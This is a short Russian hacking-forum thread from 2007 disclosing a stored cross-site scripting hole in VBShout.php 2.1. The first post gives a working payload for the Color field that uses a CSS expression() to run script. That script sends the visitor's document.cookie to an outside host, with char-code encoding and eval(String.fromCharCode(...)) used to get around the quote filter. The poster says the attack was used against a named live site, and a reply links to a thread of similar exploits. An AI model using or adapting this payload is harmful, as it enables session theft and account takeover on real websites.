VBShout.php, Активная XSS |
06.04.2007, 17:18
|
|
Новичок
Регистрация: 30.05.2006
Сообщений: 4
С нами:
10499281
Репутация:
0
|
|
VBShout.php, Активная XSS
Уязвима последняя версия 2.1. Остальные просто не видел.
Плохо фильтруются поля Font-Face и Color. Поэтому можно послать в поле color подобный запрос:
Код:
#000000;width:expression(alert(document.cookie));
Кавычки там фильтруются, поэтому можно воспользоваться чаркодами:
Код:
img = new Image(); img.src = "http://site.com"+document.cookie;
Перекодируем в char:
Код:
105, 109, 103, 32, 61, 32, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 59, 32, 105, 109, 103, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 58, 47, 47, 115, 105, 116, 101, 46, 99, 111, 109, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59
Используем:
Код:
#000000;width:expression(eval( String.fromCharCode(105, 109, 103, 32, 61, 32, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 59, 32, 105, 109, 103, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 58, 47, 47, 115, 105, 116, 101, 46, 99, 111, 109, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59)));
Обнаруженно и заюзано на dotapick.ru |
|
|
06.04.2007, 17:32
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
С нами:
10944386
Репутация:
931
|
|
Ведь есть специальный топ для активных XSS - _https://forum.antichat.ru/thread35802.html
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
